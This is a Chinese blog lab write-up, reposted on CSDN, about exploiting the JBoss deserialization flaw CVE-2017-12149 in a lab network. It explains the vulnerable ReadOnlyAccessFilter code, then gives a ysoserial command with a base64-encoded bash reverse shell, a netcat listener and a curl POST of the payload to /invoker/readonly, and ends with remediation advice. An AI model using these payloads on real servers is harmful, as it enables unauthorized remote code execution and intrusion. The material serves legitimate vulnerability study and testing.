CVE-2017-12149JBoss 反序列化漏洞利用

最新推荐文章于 2024-06-26 08:00:00 发布
最新推荐文章于 2024-06-26 08:00:00 发布
阅读量488 收藏 2
点赞数 1
文章标签: shell runtime 操作系统
原文链接:http://www.cnblogs.com/ikari/p/8989821.html
版权

CVE-2017-12149

  • 漏洞描述
    互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。
  • 影响范围
    漏洞影响5.x和6.x版本的JBOSSAS。
  • 漏洞原理
  • JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。
  • Java序列化:把Java对象转换为字节序列的过程
  • Java反序列化:指把字节序列恢复为Java对象的过程。
  • 漏洞分析
    • Java序列化与反序列化作用:便于保存数据,或者进行数据传输。
    • Java序列化文件文件头对于序列化的标识:AC ED 00 05
序列化
FileOutputStream fos = new FileOutputStream(file);
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(st);

反序列化
FileInputStream fis = new FileInputStream(file);
ObjectInputStream ois = new ObjectInputStream(fis);
Student st1 = (Student) ois.readObject();
  • 漏洞出现在 Jboss 的 HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,源码在jboss\server\all\deploy\httpha-invoker.sar\invoker.war\WEB-INF\classes\org\jboss\invocation\http\servlet目录下的ReadOnlyAccessFilter.class文件中,其中doFilter函数代码如下:
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
    throws IOException, ServletException
  {
    HttpServletRequest httpRequest = (HttpServletRequest)request;
    Principal user = httpRequest.getUserPrincipal();
    if ((user == null) && (this.readOnlyContext != null))
    {
      ServletInputStream sis = request.getInputStream();
      ObjectInputStream ois = new ObjectInputStream(sis);
      MarshalledInvocation mi = null;
      try
      {
        mi = (MarshalledInvocation)ois.readObject();
      }
      catch (ClassNotFoundException e)
      {
        throw new ServletException("Failed to read MarshalledInvocation", e);
      }
      request.setAttribute("MarshalledInvocation", mi);

      mi.setMethodMap(this.namingMethodMap);
      Method m = mi.getMethod();
      if (m != null) {
        validateAccess(m, mi);
      }
    }
    chain.doFilter(request, response);
  }

直接从http中获取数据,在没有进行检查或者过滤的情况下,尝试调用readobject()方法对数据流进行反序列操作,因此产生了Java反序列化漏洞。

实验环境

  • 操作机:kali linux 64位。

  • java.lang.runtime.exec() payloads编码

    实验工具

  • ysoserial:是一款拥有多种不同利用库的Java反序列化漏洞payload生成工具,能方便的生成命令执行Payload并序列化。本实验主要使用生成Payload功能。
  • Github:ysoserial

  • 使用参考博客:java反序列化工具ysoserial分析 – angelwhu

    实验步骤

    Step:1 ysoserial

  • 在终端输入firefox http://172.16.12.2:8080打开目标机jboss默认界面。之后进入漏洞页面http://172.16.12.2:8080/invoker/readonly。http响应码500(内部服务器错误——服务器端的CGI、ASP、JSP等程序发生错误),分析猜想,此处服务器将用户提交的POST内容进行了Java反序列化。
    1050108-20180504112514306-151212169.png
    1050108-20180504112746752-349533452.png

  • 使用工具ysoserial来生成序列化数据,构造POC(Proof Of Concept),使用bash反弹Shellnc接受反弹回来的Shell

  • 从github下载工具ysoserial 后,打开源代码能看到在处理数据时使用了Runtime.getRuntime().exec(String cmd),此时调用Runtime.getRuntime().exec(String command, String[] envp, File dir),直接构造的字符串会被下面的代码分割:

/**
     * Constructs a string tokenizer for the specified string. The
     * tokenizer uses the default delimiter set, which is
     * <code>"&nbsp;&#92;t&#92;n&#92;r&#92;f"</code>: the space character,
     * the tab character, the newline character, the carriage-return character,
     * and the form-feed character. Delimiter characters themselves will
     * not be treated as tokens.
     *
     * @param   str   a string to be parsed.
     * @exception NullPointerException if str is <CODE>null</CODE>
     */
    public StringTokenizer(String str) {
        this(str, " \t\n\r\f", false);
    }
  • StringTokenizer会对\t\n\r\f进行分割,所以如果输入命令
bash -c `bash -i >& /dev/tcp/127.0.0.1/21 0>&1`
  • 会变成
bash
-c
`bash
-i
>&
/dev/tcp/127.0.0.1/21
0>&1`

-此时需要进行编码,编码网站,勾选bash
1050108-20180504112803437-1298793259.png
注:Linux下的${IFS}也可进行编码,${IFS}的hex值是0x20 0x09 0x0a,因此不被分割,可以利用在写shell时的命令中。需要注意是,${IFS}编码后的命令中有空格,重定时,文件名中有空格会造成命令解析不完整,写入文件会失败。而在反弹shell命令中,就会导致模糊的重定向错误。

Step:2 构造生成Payload

  • ysoserial的用法:java -jar ysoserial.jar [payload] '[command]'
  • [payload] : 利用库,根据服务器端程序版本不同而不同,若如报错,可尝试跟换其他利用库。
  • [command] : 待执行的命令。
  • 执行命令:
java  -jar  ysoserial.jar  CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTEuMi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

1050108-20180504112819777-990298164.png

  • 设置nc本地监听端口6666nc -l -p 6666
  • 发送请求,获取Shell。服务器接收到以POST的方式发送的序列化数据,会进行反序列化,执行其中包含的命令,将Shell反弹至Kali机器的6666端口。我们使用curl命令发送请求,打开命令行,执行如下代码:curl http://172.16.12.2:8080/invoker/readonly --data-binary @poc.ser
    1050108-20180504112833246-1847189596.png
  • Shell弹回至nc监听的端口。
    1050108-20180504112835873-1174208634.png

漏洞建议:

  • 升级新版本。
  • 删除http-invoker.sar 组件。
  • 添加如下代码至 http-invoker.sarweb.xmlsecurity-constraint 标签中:<url-pattern>/*</url-pattern>用于对 http invoker 组件进行访问控制。

参考资料

  • https://github.com/angelwhu/ysoserial
  • http://www.vuln.cn/6295
  • http://jackson.thuraisamy.me/runtime-exec-payloads.html
  • https://www.seebug.org/vuldb/ssvid-96880
  • https://access.redhat.com/security/cve/cve-2017-12149

转载于:https://www.cnblogs.com/ikari/p/8989821.html

weixin_30314631
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149Jboss反序列化漏洞利用工具,CVE-2017-12149
JBoss漏洞 - CVE-2017-12149
HAKUNAMATATATTA的博客
12-14 1638
JBOSSApplication Server 反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
Jboss多个远程命令执行漏洞(CVE-2017-12149CVE-2015-7501、CVE-2017-7504)
最新发布
qq_68163788的博客
06-26 1102
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBOSS漏洞利用CVE-2017-12149
weixin_42539095的博客
12-10 257
下载工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip 使用: root@kali:~/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java root@kali:~/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ReverseShellCommons
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
JbossCVE-2017-12149反序列化命令执行漏洞
weixin_51151498的博客
12-11 2212
JbossCVE-2017-12149反序列化命令执行漏洞
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
JBossMQJMS 反序列化漏洞(CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞(CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞。 CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
[Vulfocus解题系列] jboss 反序列化CVE-2017-12149
00勇士王子的博客
07-10 711
漏洞介绍 名称: jboss 反序列化CVE-2017-12149) 描述: Red Hat JBoss Enterprise Application Platform(EAP)是美国红帽(Red Hat)公司的一套开源、基于J2EE的中间件平台。该平台主要用于构建、部署和托管Java应用程序与服务。Jboss Application Server是其中的一款基于JavaEE的开源的应用服务器。 该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
Jboss CVE-2017-12149JBoss 反序列化漏洞利用
baiyongliang
06-13 2445
CVE-2017-12149 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放...
WIn7-Jboss搭建-简单利用(CVE-2017-12149
AKM4180的博客
01-04 2341
WIn7X64 :Java环境+Jboss环境 工具:jboss-_CVE-2017-12149 -----------------------------------我是隔离线------------------------------- WIn7 1、安装Java环境 1.7 jdk官方:https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html 下载后默认安装即可,也可以选择定义位置(后面加环境变量要改
复现jboss CVE-2017-12149
weixin_33937778的博客
10-22 298
参考文献:https://github.com/vulhub/vulhubhttps://github.com/vulhub/vulhub/tree/e9509e2893909c3147fc33e804c34fabdffbdf3b/jboss/CVE-2017-12149 下载地址:vulhub 安装vulh...
Jboss 反序列化 CVE-2017-12149
npc88888的博客
05-12 447
JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3899
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞,JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞 该漏洞出现在/invoker/rea
Jboss反序列化漏洞
qq_44880255的博客
08-11 557
1、CVE-2017-12149 影响版本 Jboss5.x/6.x 漏洞原因 在JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下, 尝试将来自客户端的序列化数据流进行反序列化,导致任意代码执行。 引发漏洞的目录:http://your-ip:8080/invoker/readonly 漏洞复现 这里使用的环境是kali中的vulhub和docker。 进入vulhub/jboss/CVE-201
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149JBOSS应用服务器中的一个远程代码执行漏洞。JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值